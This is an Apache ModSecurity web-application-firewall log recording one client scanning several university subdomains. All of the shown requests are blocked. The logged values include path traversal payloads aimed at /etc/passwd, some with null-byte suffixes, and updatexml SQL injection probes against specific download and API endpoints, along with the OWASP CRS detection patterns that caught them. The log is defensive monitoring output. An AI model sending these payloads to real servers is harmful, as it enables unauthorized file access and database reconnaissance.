[Tue Aug 29 11:46:12.563479 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi5uEUAAAAS"]
[Tue Aug 29 11:46:12.566083 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAdxUqwAAAAC"]
[Tue Aug 29 11:46:12.570965 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAib50AAAAAA"]
[Tue Aug 29 11:46:12.573328 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi-Q-YAAAAH"]
[Tue Aug 29 11:46:13.372176 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAi-Q-gAAAAH"]
[Tue Aug 29 11:46:13.380243 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhzvhoAAAAx"]
[Tue Aug 29 11:46:13.393035 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAi-Q-kAAAAH"]
[Tue Aug 29 11:46:13.395090 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhtjjoAAAAq"]
[Tue Aug 29 11:46:13.406447 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAdxUq8AAAAC"]
[Tue Aug 29 11:46:13.415790 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAipS6UAAAAF"]
[Tue Aug 29 11:46:13.420894 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhzvhwAAAAx"]
[Tue Aug 29 11:46:13.422069 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhl0AoAAAAi"]
[Tue Aug 29 11:46:13.428941 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhrqPkAAAAo"]
[Tue Aug 29 11:46:13.431945 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAi-Q-sAAAAH"]
[Tue Aug 29 11:46:13.452356 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhrqPoAAAAo"]
[Tue Aug 29 11:46:13.463252 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhzvh4AAAAx"]
[Tue Aug 29 11:46:13.472387 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhrqPsAAAAo"]
[Tue Aug 29 11:46:13.472920 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhtjj4AAAAq"]
[Tue Aug 29 11:46:13.475012 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAi0JJ8AAAAK"]
[Tue Aug 29 11:46:13.483666 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FcCo-f0AAAhzvh8AAAAx"]
[Tue Aug 29 11:46:14.373186 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAib50gAAAAA"]
[Tue Aug 29 11:46:14.421003 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviIAAAAx"]
[Tue Aug 29 11:46:14.437449 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FsCo-f0AAAib50sAAAAA"]
[Tue Aug 29 11:46:14.441043 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAhl0BAAAAAi"]
[Tue Aug 29 11:46:14.456890 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAi-RAIAAAAH"]
[Tue Aug 29 11:46:14.460845 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviQAAAAx"]
[Tue Aug 29 11:46:14.478219 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAib50wAAAAA"]
[Tue Aug 29 11:46:14.498359 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FsCo-f0AAAi-RAQAAAAH"]
[Tue Aug 29 11:46:14.518935 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhl0BIAAAAi"]
[Tue Aug 29 11:46:15.347908 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhzviYAAAAx"]
[Tue Aug 29 11:46:15.348550 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAi-RAUAAAAH"]
[Tue Aug 29 11:46:15.351898 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAib504AAAAA"]
[Tue Aug 29 11:46:15.368870 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14F8Co-f0AAAhzvicAAAAx"]
[Tue Aug 29 11:46:15.385319 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhl0BQAAAAi"]
[Tue Aug 29 11:46:15.409367 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14F8Co-f0AAAhT32gAAAAD"]
[Tue Aug 29 11:46:15.409438 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhBSGcAAAAX"]
